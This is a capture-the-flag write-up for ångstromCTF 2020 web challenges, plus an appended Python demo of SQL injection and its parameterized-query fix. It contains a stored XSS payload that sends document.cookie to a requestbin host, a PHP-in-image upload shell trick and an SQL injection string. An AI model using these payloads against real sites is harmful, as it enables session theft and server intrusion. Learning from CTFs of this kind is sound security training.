I participated in ångstromCTF 2020 with my awesome team P1rates as python_4004 & my dude mokey. These are our writeups for some of the challenges we solved during the competition.
Noting the name of the challenge, I think the system is based on the git management system.
But I have to make sure first, so I will use the dirb tool.
Now let's try to download the git files. To do that, open your terminal and write git clone + the link of the challenge:
git clone https://gitgood.2020.chall.actf.co/.git
The first thing I thought about was looking at the log file
Clicking on "pay my some money" calls the nofret() function, so let's see the source code.
Okay, I found that the JavaScript is obfuscated, so we need to reverse this code. I use this online platform to decode our obfuscated JS file: http://www.jsnice.org/
Looking very closely I found, ohh, let's delete this line and put this function in the console console["clear"]();
the flag is :
It was a very easy challenge. All you should do is open inspect and change "give flag" to "please give flag".
the flag is :
This was an easy stored XSS challenge given the following:
First I post this post: <img src=x onerror='requestbin?cookie='+document.cookie>
I use requestbin to get the admin cookies.
I reported my post to the admin; checking my requestbin, I found the flag. The flag is:
It’s a file upload injection, so let's try to upload a shell in the form of a picture format.
I googled and found this good article
Our extension will be x.png.php
This is our shell script
Using Burp Suite:
the flag is:
From Burp Suite
I check the User-Agent header and try to inject it manually.
After many attempts, I finally reached the flag
using this query: a' or 1 limit 1 offset 2 -- -
the flag is :
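Why the User-Agent query above returns a specific row, and how a bound parameter stops it, shown as an added example that is not part of the original writeup. The `visits` table, its columns and rows are constructed, and SQLite stands in for the challenge's database, whose schema the writeup does not show.

```python
import sqlite3

# Constructed sample data: table name, columns and rows are assumptions.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE visits (id INTEGER PRIMARY KEY, user_agent TEXT, note TEXT)")
    db.executemany(
        "INSERT INTO visits (user_agent, note) VALUES (?, ?)",
        [
            ("Mozilla/5.0", "row-0"),
            ("curl/7.68.0", "row-1"),
            ("internal-bot", "row-2-secret"),
            ("O'Reilly-Reader/1.0", "row-3"),
        ],
    )
    return db

def lookup_vulnerable(db, user_agent):
    # The header value is pasted into the SQL text, so a quote inside it
    # closes the string literal and the remainder is parsed as SQL.
    sql = "SELECT note FROM visits WHERE user_agent = '%s'" % user_agent
    return db.execute(sql).fetchall()

def lookup_parameterized(db, user_agent):
    # Bound parameter: the header is only ever compared as data.
    sql = "SELECT note FROM visits WHERE user_agent = ?"
    return db.execute(sql, (user_agent,)).fetchall()

PAYLOAD = "a' or 1 limit 1 offset 2 -- -"  # the query from the writeup

if __name__ == "__main__":
    db = make_db()
    # Normal header: both versions agree.
    print(lookup_vulnerable(db, "curl/7.68.0"), lookup_parameterized(db, "curl/7.68.0"))
    # "or 1" matches every row, "limit 1 offset 2" picks the third one,
    # and "-- -" comments out the trailing quote.
    print(lookup_vulnerable(db, PAYLOAD))
    # With binding, the same string matches no stored User-Agent.
    print(lookup_parameterized(db, PAYLOAD))
    # A legitimate header containing an apostrophe also works once bound,
    # while the string-built query fails with a syntax error.
    print(lookup_parameterized(db, "O'Reilly-Reader/1.0"))
```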